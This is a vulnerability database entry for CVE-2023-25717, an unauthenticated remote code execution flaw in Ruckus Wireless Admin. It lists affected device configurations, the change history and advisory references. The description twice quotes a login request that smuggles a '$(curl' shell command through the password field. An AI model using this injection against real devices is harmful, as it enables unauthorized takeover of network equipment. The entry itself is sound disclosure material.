CVE-2023-25717

Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

Configurations

Configuration 1

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:ruckuswireless:smartzone_ap:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:e510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h320:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h350:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h550:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:m510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r310:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r320:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r350:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r550:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r610:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r650:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r710:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r720:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r730:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r750:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r760:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r850:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz-144:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz100:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz300:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310c:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310d:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310n:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310s:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t350c:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t350d:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t350se:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t610:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t710:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t710s:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t750:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t750se:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t811-cm:-:*:*:*:*:*:*:*

Configuration 2

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:ruckuswireless:smartzone_ap:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:e510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h320:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:m510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r310:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r320:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r500:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r550:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r600:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r610:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r650:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r710:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r720:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r730:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r750:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r850:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t300:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t301n:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t301s:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310c:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310d:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310n:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310s:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t504:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t610:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t710:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t710s:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t750:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t750se:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t811-cm:-:*:*:*:*:*:*:*

Configuration 3

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:ruckuswireless:smartzone_ap:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:h500:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r300:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r700:-:*:*:*:*:*:*:*

Configuration 4

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:ruckuswireless:smartzone_ap:*:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r560:-:*:*:*:*:*:*:*

Configuration 5

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:commscope:ruckus_smartzone_firmware:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:sz-144:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz300:-:*:*:*:*:*:*:*

Configuration 6

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:commscope:ruckus_smartzone_firmware:6.1.0.0.935:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:sz-144:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz100:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz300:-:*:*:*:*:*:*:*

Configuration 7

AND
cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:m510-jp:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:p300:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:q410:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:q710:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:q910:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t811-cm\(non-spf\):-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:zd1000:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:zd1100:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:zd1200:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:zd3000:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:zd5000:-:*:*:*:*:*:*:*

Configuration 8

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:commscope:ruckus_smartzone_firmware:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:sz-144-federal:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz300-federal:-:*:*:*:*:*:*:*

History

03 Nov 2025, 18:14

Type Values Removed Values Added
References () https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717 - () https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717 - US Government Resource

22 Oct 2025, 00:18

Type Values Removed Values Added
References
  • () https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717 -

21 Oct 2025, 20:19

Type Values Removed Values Added
References
  • {'url': 'https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717', 'source': '134c704f-9b21-4f2e-91b3-4a467353bcc0'}

21 Oct 2025, 19:19

Type Values Removed Values Added
References
  • () https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717 -

22 Aug 2025, 21:09

Type Values Removed Values Added
CPE cpe:2.3:o:ruckuswireless:smartzone:6.1.0.0.935:*:*:*:*:*:*:*
cpe:2.3:o:ruckuswireless:smartzone:*:*:*:*:*:*:*:*
cpe:2.3:o:commscope:ruckus_smartzone_firmware:*:*:*:*:*:*:*:*
cpe:2.3:o:commscope:ruckus_smartzone_firmware:6.1.0.0.935:*:*:*:*:*:*:*
First Time Commscope ruckus Smartzone Firmware
Commscope

21 Nov 2024, 07:49

Type Values Removed Values Added
Summary
  • (es) Ruckus Wireless Admin hasta la versión 10.4 permite la ejecución remota de código a través de una solicitud HTTP GET no autenticada, como lo demuestra /forms/doLogin?login_username=admin&password=password$(curl substring.
References () https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ - Exploit, Third Party Advisory () https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ - Exploit, Third Party Advisory
References () https://support.ruckuswireless.com/security_bulletins/315 - Patch, Product, Vendor Advisory () https://support.ruckuswireless.com/security_bulletins/315 - Patch, Product, Vendor Advisory